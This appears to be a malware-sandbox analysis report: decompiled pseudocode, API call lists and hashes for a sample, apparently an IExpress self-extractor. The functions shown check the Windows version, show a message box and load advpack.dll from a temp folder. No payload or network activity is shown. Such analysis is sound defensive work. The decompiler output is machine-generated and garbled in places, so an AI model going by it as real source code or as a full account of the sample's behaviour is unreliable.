                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                        						 *0x1f8184 = 1;
                                                                                                                                                                                                        						 *0x1f8180 = 1;
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						 *0x1f9a40 = _t119;
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						__eflags =  *0x1f8a34 - _t138; // 0x0
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                                                                        						if(_t115 == 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v428 = _t135;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                        						_t11 =  &_v420;
                                                                                                                                                                                                        						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                        						__eflags =  *_t11;
                                                                                                                                                                                                        						_v440 = _t115;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_v424 = _t135 * 0x18;
                                                                                                                                                                                                        							_v436 = E001F2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                        							_t91 = E001F2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                        							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x1f8a38 & 0x00000001;
											if(( *0x1f8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("cent");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E001F681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E001F67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E001F28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                        							_t135 =  &(_t135[1]);
                                                                                                                                                                                                        							_v428 = _t135;
                                                                                                                                                                                                        							_v420 = _t135;
                                                                                                                                                                                                        							__eflags = _t135 - 2;
                                                                                                                                                                                                        						} while (_t135 < 2);
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t77 == 1;
                                                                                                                                                                                                        					if(_t77 == 1) {
                                                                                                                                                                                                        						 *0x1f9a40 = _t119;
                                                                                                                                                                                                        						 *0x1f8184 = 1;
                                                                                                                                                                                                        						 *0x1f8180 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - 3;
                                                                                                                                                                                                        						if(_t133 > 3) {
                                                                                                                                                                                                        							__eflags = _t133 - 5;
                                                                                                                                                                                                        							if(_t133 < 5) {
                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t113 = 3;
                                                                                                                                                                                                        							_t119 = _t113;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t119 = 1;
                                                                                                                                                                                                        						_t114 = 3;
                                                                                                                                                                                                        						 *0x1f9a40 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - _t114;
                                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0x1f8184 = _t135;
                                                                                                                                                                                                        							 *0x1f8180 = _t135;
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t138 = 0x4ca;
                                                                                                                                                                                                        					goto L44;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = 0x4b4;
                                                                                                                                                                                                        					L44:
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					L65:
                                                                                                                                                                                                        					_t133 = _t138;
                                                                                                                                                                                                        					E001F44B9(0, _t138);
                                                                                                                                                                                                        					L66:
                                                                                                                                                                                                        					return E001F6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f39bc
                                                                                                                                                                                                        0x001f39bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f39c3
                                                                                                                                                                                                        0x001f39c9
                                                                                                                                                                                                        0x001f39ce
                                                                                                                                                                                                        0x001f39d0
                                                                                                                                                                                                        0x001f39e3
                                                                                                                                                                                                        0x001f39e5
                                                                                                                                                                                                        0x001f39e6
                                                                                                                                                                                                        0x001f39f1
                                                                                                                                                                                                        0x001f39f7
                                                                                                                                                                                                        0x001f39fa
                                                                                                                                                                                                        0x001f3a01
                                                                                                                                                                                                        0x001f3a04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3a06
                                                                                                                                                                                                        0x001f3a09
                                                                                                                                                                                                        0x001f3a09
                                                                                                                                                                                                        0x001f3a0b
                                                                                                                                                                                                        0x001f3a0b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3a09
                                                                                                                                                                                                        0x001f39fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f39fc
                                                                                                                                                                                                        0x001f39d3
                                                                                                                                                                                                        0x001f39d8
                                                                                                                                                                                                        0x001f39da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f39dc
                                                                                                                                                                                                        0x001f39b6
                                                                                                                                                                                                        0x001f3955
                                                                                                                                                                                                        0x001f395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3961
                                                                                                                                                                                                        0x001f3963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3969
                                                                                                                                                                                                        0x001f3969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3969
                                                                                                                                                                                                        0x001f3915
                                                                                                                                                                                                        0x001f3915
                                                                                                                                                                                                        0x001f391b
                                                                                                                                                                                                        0x001f391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f392d
                                                                                                                                                                                                        0x001f3933
                                                                                                                                                                                                        0x001f3938
                                                                                                                                                                                                        0x001f393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3940
                                                                                                                                                                                                        0x001f3946
                                                                                                                                                                                                        0x001f394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f38f2
                                                                                                                                                                                                        0x001f3843
                                                                                                                                                                                                        0x001f3845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f384b
                                                                                                                                                                                                        0x001f384d
                                                                                                                                                                                                        0x001f3883
                                                                                                                                                                                                        0x001f3885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f389a
                                                                                                                                                                                                        0x001f389e
                                                                                                                                                                                                        0x001f389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f38a0
                                                                                                                                                                                                        0x001f38a0
                                                                                                                                                                                                        0x001f38a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f38a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f38a4
                                                                                                                                                                                                        0x001f384f
                                                                                                                                                                                                        0x001f3851
                                                                                                                                                                                                        0x001f3857
                                                                                                                                                                                                        0x001f386e
                                                                                                                                                                                                        0x001f3877
                                                                                                                                                                                                        0x001f387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3881
                                                                                                                                                                                                        0x001f3859
                                                                                                                                                                                                        0x001f385c
                                                                                                                                                                                                        0x001f3862
                                                                                                                                                                                                        0x001f3866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f38f4
                                                                                                                                                                                                        0x001f38f4
                                                                                                                                                                                                        0x001f38f5
                                                                                                                                                                                                        0x001f38fb
                                                                                                                                                                                                        0x001f3901
                                                                                                                                                                                                        0x001f3901
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f390a
                                                                                                                                                                                                        0x001f374b
                                                                                                                                                                                                        0x001f374e
                                                                                                                                                                                                        0x001f375c
                                                                                                                                                                                                        0x001f3764
                                                                                                                                                                                                        0x001f3769
                                                                                                                                                                                                        0x001f376e
                                                                                                                                                                                                        0x001f3771
                                                                                                                                                                                                        0x001f379c
                                                                                                                                                                                                        0x001f379f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f37a3
                                                                                                                                                                                                        0x001f37a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f37a4

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 001F3723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 001F39C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 001F39F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$cent
                                                                                                                                                                                                        • API String ID: 2519184315-3438608206
                                                                                                                                                                                                        • Opcode ID: 44256459c70e09bff86a34326e7e49f7cb6b448eecc2a8aaba9762f19d73a089
                                                                                                                                                                                                        • Instruction ID: ba51b7bad9a71e0de9542d1b71ec26b3902f8902553fc3d9d57f3702e11bd923
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44256459c70e09bff86a34326e7e49f7cb6b448eecc2a8aaba9762f19d73a089
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B191E4B1A0122C9FDB39DB25CC817BAB7A0BB45304F1501A9DAA9D7251D7B48F81CB41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E001F6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				CHAR* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t18 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				E001F1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        				_t26 = "advpack.dll";
                                                                                                                                                                                                        				E001F658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                        					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001F64DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001F64F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001F6502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-3736221019
                                                                                                                                                                                                        • Opcode ID: 389514127c8aa0a813d6bb330b17e685abe705bbfcdb294d605305148ae03d37
                                                                                                                                                                                                        • Instruction ID: 70ef3dee2c145717aace1dfc8d5956eeb71d0c9f0b050e810319905f32bc311a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 389514127c8aa0a813d6bb330b17e685abe705bbfcdb294d605305148ae03d37
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF018170A0410CABDB54EB64DC49EFA7778EBA4310F900295F689A21D0DF74AECACA51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                        				long _t68;
                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                                        				_t106 = 0;
                                                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t103 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_t106 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t62 = 0;
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                        						if(E001F2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_t99 = _v16;
                                                                                                                                                                                                        							_t70 = _v8 + _t99;
                                                                                                                                                                                                        							_t93 = _v24;
                                                                                                                                                                                                        							_t87 = _v20;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                        								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                        								_v36 = _t73;
                                                                                                                                                                                                        								if(_t73 != 0) {
                                                                                                                                                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                        										L15:
                                                                                                                                                                                                        										GlobalUnlock(_t103);
                                                                                                                                                                                                        										_t99 = _v16;
                                                                                                                                                                                                        										L18:
                                                                                                                                                                                                        										_t87 = _t87 + 1;
                                                                                                                                                                                                        										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                        										_v20 = _t87;
                                                                                                                                                                                                        										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L19;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t79 = _v44;
                                                                                                                                                                                                        										_t88 = _t106;
                                                                                                                                                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                        										_t101 = _v28;
                                                                                                                                                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                        										_t97 = _v48;
                                                                                                                                                                                                        										_v36 = _t83;
                                                                                                                                                                                                        										_t109 = _t83;
                                                                                                                                                                                                        										do {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E001F2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E001F2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                        											_t109 = _t109 + 0x18;
                                                                                                                                                                                                        											_t88 = _t88 + 4;
                                                                                                                                                                                                        										} while (_t88 < 8);
                                                                                                                                                                                                        										_t87 = _v20;
                                                                                                                                                                                                        										_t106 = 0;
                                                                                                                                                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                        												GlobalUnlock(_t103);
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L15;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L20:
                                                                                                                                                                                                        				 *_a8 = _t87;
                                                                                                                                                                                                        				if(_t103 != 0) {
                                                                                                                                                                                                        					GlobalFree(_t103);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t106;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x001f29da
                                                                                                                                                                                                        0x001f29dd
                                                                                                                                                                                                        0x001f29df
                                                                                                                                                                                                        0x001f29ec
                                                                                                                                                                                                        0x001f29f8
                                                                                                                                                                                                        0x001f29fc
                                                                                                                                                                                                        0x001f29ff
                                                                                                                                                                                                        0x001f2a02
                                                                                                                                                                                                        0x001f2a07
                                                                                                                                                                                                        0x001f2a0a
                                                                                                                                                                                                        0x001f2a0f
                                                                                                                                                                                                        0x001f2a19
                                                                                                                                                                                                        0x001f2a81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2a0f
                                                                                                                                                                                                        0x001f298c
                                                                                                                                                                                                        0x001f2974
                                                                                                                                                                                                        0x001f2962
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f294f
                                                                                                                                                                                                        0x001f2912
                                                                                                                                                                                                        0x001f2a65
                                                                                                                                                                                                        0x001f2a68
                                                                                                                                                                                                        0x001f2a6c
                                                                                                                                                                                                        0x001f2a6f
                                                                                                                                                                                                        0x001f2a6f
                                                                                                                                                                                                        0x001f2a7d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 001F2A6F
                                                                                                                                                                                                          • Part of subcall function 001F2773: CharUpperA.USER32(FCDC6E1A,00000000,00000000,00000000), ref: 001F27A8
                                                                                                                                                                                                          • Part of subcall function 001F2773: CharNextA.USER32(0000054D), ref: 001F27B5
                                                                                                                                                                                                          • Part of subcall function 001F2773: CharNextA.USER32(00000000), ref: 001F27BC
                                                                                                                                                                                                          • Part of subcall function 001F2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2829
                                                                                                                                                                                                          • Part of subcall function 001F2773: RegQueryValueExA.ADVAPI32(?,001F1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2852
                                                                                                                                                                                                          • Part of subcall function 001F2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2870
                                                                                                                                                                                                          • Part of subcall function 001F2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F28A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,001F3938,?,?,?,?,-00000005), ref: 001F2958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 001F2969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,001F3938,?,?,?,?,-00000005,?), ref: 001F2A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 001F2A81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
